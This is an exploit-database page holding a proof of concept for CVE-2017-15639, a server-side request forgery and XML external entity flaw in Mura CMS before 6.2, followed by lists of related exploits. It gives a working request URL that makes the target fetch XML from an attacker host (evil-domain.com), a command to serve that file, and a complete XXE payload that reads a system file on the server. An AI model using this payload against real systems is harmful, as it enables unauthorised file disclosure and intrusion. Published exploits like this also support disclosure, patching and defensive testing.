Menu

Search for hundreds of thousands of exploits

"Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection"

Author

Exploit author

"Anthony Cole"

Platform

Exploit platform

cfm

Release date

Exploit published date

2017-10-24

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Exploit Title: Mura CMS before 6.2 SSRF + XXE
# Date: 30-10-2017
# Exploit Author: Anthony Cole
# Vendor Homepage: http://www.getmura.com/
# Version: before 6.2
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Tested on: Windows 2008 w/ Coldfusion 8
# CVE: CVE-2017-15639
# Category: webapps
 
1. Description
   
Any user can cause Mura CMS before version 6.2 to make a http request.  As an added bonus, the response from that HTTP GET request is passed directly to XmlParse().  It is possible to read a file from the file system using an XXE attack.
 
   
2. Proof of Concept

vulnerable file is on github, line 50:
https://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm
 
http://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500

Explanation of params
	siteid - The siteid can be obtained by viewing the html source code of the target home page and searching "siteid".
	rssurl - This is the URL you want Mura CMS to call out to.
	
To perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80
	
Then create a file:

<?xml version="1.0" ?>
<!DOCTYPE rss [
        <!ENTITY send SYSTEM "file:///c:\Windows\System32\drivers\etc\hosts">
]>

<rss version="2.0">
<channel>
        <title>title</title>
        <link>link</link>
        <description>description</description>
        <generator>http://www.getmura.com</generator>
        <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>
        <language>en-us</language>
        <item>
                <title>Item title</title>
                <link>http://host/</link>
                <guid isPermaLink="false">00000000-0000-0000-0000000000000000</guid>
                <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>
                <description>&send;</description>
        </item>
</channel>
</rss>
   
3. Solution:

delete readRSS.cfm from the server.
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-09-16 "Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload" webapps cfm "Pankaj Kumar Thakur"
2017-10-24 "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection" webapps cfm "Anthony Cole"
2015-04-21 "BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion" webapps cfm Portcullis
2011-09-27 "Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm MustLive
2011-08-18 "Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting" webapps cfm G.R0b1n
2011-02-24 "Alcassoft's SOPHIA CMS - SQL Injection" webapps cfm p0pc0rn
2011-02-15 "Lingxia I.C.E CMS - Blind SQL Injection" webapps cfm mr_me
2011-01-25 "ActiveWeb Professional 3.0 - Arbitrary File Upload" webapps cfm StenoPlasma
2010-12-13 "Mura CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm "Richard Brain"
2010-11-24 "ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)" webapps cfm Metasploit
Release Date Title Type Platform Author
2020-05-12 "TylerTech Eagle 2018.3.11 - Remote Code Execution" webapps java "Anthony Cole"
2019-01-07 "Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data" webapps windows "Anthony Cole"
2017-10-24 "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection" webapps cfm "Anthony Cole"
2016-09-22 "Microix Timesheet Module - SQL Injection" webapps aspx "Anthony Cole" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected